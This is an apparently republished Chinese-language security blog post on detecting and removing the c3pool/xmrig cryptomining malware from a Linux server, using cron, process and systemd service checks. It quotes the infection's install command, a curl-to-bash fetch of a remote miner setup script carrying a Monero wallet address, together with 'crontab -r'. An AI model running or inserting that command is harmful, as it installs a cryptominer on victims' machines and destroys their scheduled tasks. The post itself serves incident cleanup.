挖礦平臺(tái):貓池
病毒來(lái)源安裝腳本
cat /root/c3pool/config.json
crontab -r
cd /root/c3pool
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12
曠池提供的卸載腳本
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
中毒現(xiàn)象
高cpu和高內(nèi)存占用
kill -9 殺掉之后自動(dòng)重啟
進(jìn)程ip:47.76.163.177 為美國(guó)IP,IP查詢
查殺過(guò)程
查找病毒腳本位置find / -name xmrig
檢查是否有相關(guān)的定時(shí)任務(wù)
crontab -l
如果有定時(shí)任務(wù)則刪除掉
find / -name cron* -type d
查找自啟動(dòng)服務(wù)
因?yàn)閗ill -9殺掉進(jìn)程之后會(huì)立即重啟,需找到自啟動(dòng)服務(wù),禁用后刪除
systemctl list-units --type=service
find / -name c3pool_miner.service
找到所有相關(guān)的服務(wù),全部刪除
# 關(guān)閉自啟動(dòng)
systemctl disable c3pool_miner.service
# 停止服務(wù)
systemctl stop c3pool_miner.service
# 刪除服務(wù)
rm -f /etc/systemd/system/c3pool_miner.service
最后將腳本文件刪除文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-855122.html
rm -rf /root/c3pool/
【安全】查殺linux上c3pool挖礦病毒xmrig
【安全】查殺linux挖礦病毒 kswapd0
【安全】查殺linux隱藏挖礦病毒rcu_tasked
【安全】挖礦木馬自助清理手冊(cè)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-855122.html
到了這里,關(guān)于【安全】查殺linux上c3pool挖礦病毒xmrig的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!